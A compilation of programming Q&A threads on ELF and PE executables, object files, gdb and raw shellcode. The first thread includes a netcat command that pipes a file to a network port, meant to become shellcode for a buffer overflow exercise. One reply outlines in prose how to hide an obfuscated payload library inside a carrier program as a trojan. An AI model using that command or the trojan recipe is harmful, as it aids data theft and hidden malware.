Edit: It appears I have a lot more reading to do...
Also, for those telling me this is a bad idea, it's for a buffer overflow exercise.
I have a fairly simple C program:
int main() {
system("cat file | nc -p 33 localhost 8080");
return 0;
}
I want to turn it into hex assembly code. Think something like:
\x55\x43\xff\x75\x13\x77...
I tried doing:
gcc -o shell shell.c
for i in $(objdump -d shell -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
And that gave me a nice long string of hex. But when I tested it in this program, I got a segfault.
code = "\x55\x43\xff\x75\x13\x77..."
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
Anyone know how I can get this working? Thanks! Also, I don't know if it matters but it's a 64 bit system.
You are missing a whole bunch of stuff that the OS does for you between the time the binary code is loaded from disk and it is executed. The function call "system(char *command)" for example: The pointer to the command characters is invalid until the OS loader "fixes" the pointers.
If you are very, very careful you can construct code that does not rely on pointers and can run from any arbitrary address without help from the OS loader. This is how stack overflow exploits are created. Most modern CPUs prevent this code from running by using the memory manager to mark memory as either "DATA" or "CODE" and faulting if your program tries to execute DATA or write to CODE.
What you are trying to do, the OS is trying to prevent.
This won't work. The main reason is: What your compiler creates for you is not just plain binary code but a well-defined file-format for a runnable program (on windows a PE file, on linux an ELF file) This file is read by the dynamic linker of your operating system and preprocessed (e.g. linked to dynamic shared objects, read libraries) before it is executed by jumping to the entry point that is somehow given in the headers of the file. There's no way such a file could be executed by just jumping to the first byte in the file. In fact, it's the linker that creates the output format, but it's invoked by the compiler automatically.
If you JUST want the assembler code, use gcc -S ... you will get mnemonics that could be fed to a standalone assembler.
There are ways to trick the linker to emit a plain binary of your code (See here an interesting read about how to use that to generate an MS-DOS .COM file), but you still have the problem that your program typically doesn't consist of only the text (read, the binary code executed) but you also have data, typically in .data segment (for readonly) and .bss segment (for readwrite).
Adding to that, placing the binary in a c string will normally put it in the .data segment. Although this could be executable, it doesn't have to, and from a security point of view, it shouldn't -- see Data Execution Prevention.
All in all, just forget about that...
I'm not sure what you are trying to achieve, but if I put my black hat on for a minute...
If you are trying to write a stack overflow exploit, you need to learn about the memory manager and the gory details of the target CPU. You will be dealing strictly with the CPU and circumventing the OS entirely.
If you are trying to write a trojan horse, you should compile your payload as a dynamic library (.so) and put the hex for the entire payload.so file into code[]. Then, in the carrier program, map code[] to a virtual file (or just write it to disk) and call loadlibrary() on the (virtual) file. You still won't be root, but your payload will be buried inside the first executable. You can bit-twiddle the code[] bytes to obfuscate the payload. You will also need to figure out how to set the executable flag on the newly created file.
For either of these, you will be working against the CPU and/or OS.
Related
I have this program called parser I compiled with -g flag this is my makefile
parser: header.h parser.c
gcc -g header.h parser.c -o parser
clean:
rm -f parser a.out
code for one function in parser.c is
int _find(char *html , struct html_tag **obj)
{
char temp[strlen("<end")+1];
memcpy(temp,"<end",strlen("<end")+1);
...
...
.
return 0;
}
What I like to see when I debug the parser or something can I also have the capability to change the lines of code after hitting breakpoint and while n through the code of above function. If its not the job of gdb then is there any opensource solution to actually changing code and possible saving so when I run through the next statement in code then changed statement before doing n (possible different index of array) will execute, is there any opensource tool or can it be done in gdb do I need to do some compiling options.
I know I can assign values to variables at runtime in gdb but is this it? like is there any thing like actually also being capable of changing soure
Most C implementations are compiled. The source code is analyzed and translated to processor instructions. This translation would be difficult to do on a piecewise basis. That is, given some small change in the source code, it would be practically impossible to update the executable file to represent those changes. As part of the translation, the compiler transforms and intertwines statements, assigns processor registers to be used for computing parts of expressions, designates places in memory to hold data, and more. When source code is changed slightly, this may result in a new compilation happening to use a different register in one place or needing more or less memory in a particular function, which results in data moving back or forth. Merging these changes into the running program would require figuring out all the differences, moving things in memory, rearranging what is in what processor register, and so on. For practical purposes, these changes are impossible.
GDB does not support this.
(Apple’s developer tools may have some feature like this. I saw it demonstrated for the Swift programming language but have not used it.)
I am using Dev-C++, which compiles using GCC, on Windows 8.1, 64-bit.
I noticed that all my .c files always compiled to at least 128-kilobyte .exe files, no matter how small the source is. Even a simple "Hello, world!" was 128kb. Source files with more lines of code increased the size of the executable as I would expect, but all the files started off at at least 128kb, as if that's some sort of minimum size.
I know .exe's don't actually have a minimum size like that; .kkrieger is a full first-person shooter with 3d graphics and sound that all fit inside a single 96kb executable.
Trying to get to the bottom of this, I opened up my hello_world.exe in Notepad++. Perhaps my compiler adds a lengthy header that happens to be 128kb, I thought.
Unfortunately, I don't know enough about executables to be able to make sense of it, though I did find strings like "Address %p has no image-section VirtualQuery failed for %d bytes at address %p" buried among the usual garble of characters in an .exe.
Of course, this isn't a serious problem, but I'd like to know why it's happening.
Why is this 128kb minimum happening? Does it have something to do with my 64-bit OS, or perhaps with a quirk of my compiler?
Short answer: it depends.
Long answer: it depends on what operating system you have and how it handles executables.
Most (if not all) compilers of programming languages do not break it down to the absolute, raw x86/ARM/other architecture's machine code. Instead, after they pack your source code into a .o (object) file, they then bring the .o and its libraries and "link" it all together, in such a way that it forms a standard executable format. These "executable formats" are essentially system-specific file formats that contain low level, very-close-to-machine-code instructions that the OS interprets in such a way that it can relay those low-level instructions to the CPU in the form of machine-code instructions.
For example, I'll talk about the two most commonly used executable formats for Linux devices: ELF and ELF64 (I'll let you figure out what the namesake differences are yourself). ELF stands for Executable and Linkable Format. In every ELF-compiled program, the file starts off with a 4-byte "magic number", which is simply a hexadecimal 0x7F followed by the string "ELF" in ASCII. The next byte is set to either 1 or 2, which signifies that the program is for 32-bit or 64-bit architectures, respectively. And after that, another byte to signify the program's endianness. After that, there's a few more bytes that tell what the architecture is, and so on, until you reach a total of up to 64 bytes for the 64-bit header.
However, 64 bytes is not even close to the 128K that you have stated. That's because (aside from the fact that the windows .exe format is usually much more complex), there is the C++ standard library at fault here. For instance, let's have a look at a common use of the C++ iostream library:
#include <iostream>
int main()
{
std::cout<<"Hello, World!"<<std::endl;
return 0;
}
This program may compile to an extremely large executable on a windows system, because the moment you add iostream to your program, it adds the entire C++ standard library into it, increasing your executable's size immensely.
So, how do we rectify this problem? Simple:
Use the C standard library implementation for C++!
#include <cstdio>
int main()
{
printf("Hello, World!\n");
return 0;
}
Simply using the original C standard library can decrease your size from a couple hundred KBytes to a handful at most. The reason that this happens is simply because GCC/G++ really likes linking programs with the entire standard C++ library for some odd reason.
However, sometimes you absolutely need to use the C++-specific libraries. In that case,a lot of linkers have some kind of command-line option that essentially tells the linker "Hey, I'm only using like, 2 functions from the STDCPP library, you don't need the whole thing". On the Linux linker ld, this is the command-line option -nodefaultlibs. I'm not entirely sure what this is on windows, though. Of course, this can very quickly break a TON of calls and such in programs that make a lot of standard C++ calls.
So, in the end, I would worry more about simply re-writing your program to use the regular C functions instead of the new-fangled C++ functions, as amazing as they are. that is if you're worried about size.
I want to compile my C file with clang and then decompile it with with ndisasm (for educational purposes). However, ndisasm says in it's manual that it only works with binary and not executable files:
ndisasm only disassembles binary files: it has
no understanding of the header information
present in object or executable files. If you
want to disassemble an object file, you should
probably be using objdump(1).
What's the difference, exactly? And what does clang output when I run it with a simple C file, an executable or a binary?
An object file contains machine language code, and all sorts of other information. It sounds like ndisasm wants just the machine code, not the other stuff. So the message is telling you to use the objdump utility to extract just the machine code segment(s) from the object file. Then you can presumably run ndisasm on that.
And what does clang output when I run it with a simple C file, an executable or a binary?
A C compiler is usually able to create a 'raw' binary, which is Just The Code, hold the tomato, because for some (rare!) purposes that can be useful. Think, for instance, of boot sectors (which cannot 'load' an executable the regular way because the OS to load them is not yet started) and of programmable RAM chips. An Operating system in itself usually does not like to execute 'raw binary code' - pretty much for the same reasons. An exception is MS Windows, which still can run old format .com binaries.
By default, clang will create an executable. The intermediate files, called object files, are usually deleted after the executable is linked (glued together with library functions and an appropriate executable header). To get just a .o object file, use the -c switch.
Note that Object files also contain a header. After all, the linker needs to know what the file contains before it can link it to other parts.
For educational purposes, you may want to examine the object file format. Armed with that knowledge it should be possible to write a program that can tell you at what offset in the file the actual code starts. Then you can feed that information into ndisasm.
In addition to the header, files may contain even more data after the instructions. Again, ndisasm does not know and nor does it care. If your test program contains a string Hello world! somewhere at the end, it will happily try to disassemble that as well. It's up to you to recognize this garbage as such, and ignore what ndisasm does to it.
I just wrote a Hello world program in C that I was playing around with. I'd like to try and dump the binary from memory(using gdb) and try to create another executable from it. I tried dumping the page with executable privileges followed by its data page; however it segfaults. Are there any approaches to doing this? Is there any way I can debug and find out why it crashes? Any generic suggestions at all?
Thanks.
[EDIT]
Its on linux and I've tried it on both 32 and 64-bit x86. The kernel version is 3.13. I set a breakpoint on _start, dumped the executable page followed by its data page to a file and tried executing it.
Wait, are you just dumping the mapped text (exectuable page) section followed by the mapped data section to a file? That itself wouldn't be a valid ELF object, an ELF file needs an ELF header as well. I am surprised the OS even let you attempt to execute that, you should have gotten an error about an invalid ELF header or something like that.
In addition to the header, an ELF file contains many more sections that are important to be able to run it.
As for debugging, I'd start with GDB to see where it crashes. Does your program crash, or does the dynamic linker crash when trying to load your program? If the dynamic linker crashes, try debugging that, e.g. with
gdb --args /lib64/ld-2.18.so <your program>
Attempts to re-create ELF files from memory have been done before - have a look at Statifier, which even statically includes all loaded dynamic libraries into the resulting ELF.
It might be not very simple and is certainly processor and operating system specific.
You could look at emacs source unexec.c which is doing what you want. See this answer
The title is clear, we can loaded a library by dl_open etc..
But how can I get the signature of functions in it?
This answer cannot be answered in general. Technically if you compiled your executable with exhaustive debugging information (code may still be an optimized, release version), then the executable will contain extra sections, providing some kind of reflectivity of the binary. On *nix systems (you referred to dl_open) this is implemented through DWARF debugging data in extra sections of the ELF binary. Similar it works for Mach Universal Binaries on MacOS X.
Windows PEs however uses a completely different format, so unfortunately DWARF is not truley cross plattform (actually in the early development stages of my 3D engine I implemented an ELF/DWARF loader for Windows, so that I could use a common format for the engines various modules, so with some serious effort such can be done).
If you don't want to go into implementing your own loaders, or debugging information accessors, then you may embed the reflection information through some extra symbols exported (by some standard naming scheme) which refer to a table of function names, mapping to their signature. In the case of C source files writing a parser to extract the information from the source file itself is rather trivial. C++ OTOH is so notoriously difficult to parse correctly, that you need some fully fledged compiler to get it right. For this purpose GCCXML was developed, technically a GCC that emits the AST in XML form instead of an object binary. The emitted XML then is much easier to parse.
From the extracted information create a source file with some kind of linked list/array/etc. structure describing each function. If you don't directly export each function's symbol but instead initialize some field in the reflection structure with the function pointer you got a really nice and clean annotated exporting scheme. Technically you could place this information in a spearate section of the binary as well, but putting it in the read only data section does the job as well, too.
However if you're given a 3rd party binary – say worst case scenario it has been compiled from C source, no debugging information and all symbols not externally referenced stripped – you're pretty much screwed. The best you could do, was applying some binary analysis of the way the function accesses the various places in which parameters can be passed.
This will only tell you the number of parameters and the size of each parameter value, but not the type or name/meaning. When reverse engineering some program (e.g. malware analysis or security audit), identifying the type and meaning of the parameters passed to functions is one of the major efforts. Recently I came across some driver I had to reverse for debugging purposes, and you cannot believe how astounded I was by the fact that I found C++ symbols in a Linux kernel module (you can't use C++ in the Linux kernel in a sane way), but also relieved, because the C++ name mangling provided me with plenty information.
On Linux (or Mac) you can use a combination of "nm" and "c++filt" (for C++ libraries)
nm mylibrary.so | c++filt
or
nm mylibrary.a | c++filt
"nm" will give you the mangled form and "c++filt" attempts to put them in a more human-readable format. You might want to use some options in nm to filter down the results, especially if the library is large (or you can "grep" the final output to find a particular item)
No this is not possible. Signature of a function doesn't mean anything at runtime, its a piece of information useful at compile time for the compiler to validate your program.
You can't. Either the library publishes a public API in a header, or you need to know the signature by some other means.
The parameters of a function in the lower level depends on how many stack arguments in the stack frame you consider and how you interpret them. Therefore once the function is compiled into object code it is not possible to get the signature like that. One remote possibility is to disassemble the code and read how it function is working to know the number if parameters, but still the type would be difficult or impossible to determine. In a word, it is not possible.
This information is not available. Not even the debugger knows:
$ cat foo.c
#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[])
{
char foo[10] = { 0 };
char bar[10] = { 0 };
printf("%s\n", "foo");
memcpy(bar, foo, sizeof(foo));
return 0;
}
$ gcc -g -o foo foo.c
$ gdb foo
Reading symbols from foo...done.
(gdb) b main
Breakpoint 1 at 0x4005f3: file foo.c, line 5.
(gdb) r
Starting program: foo
Breakpoint 1, main (argc=1, argv=0x7fffffffe3e8) at foo.c:5
5 {
(gdb) ptype printf
type = int ()
(gdb) ptype memcpy
type = int ()
(gdb)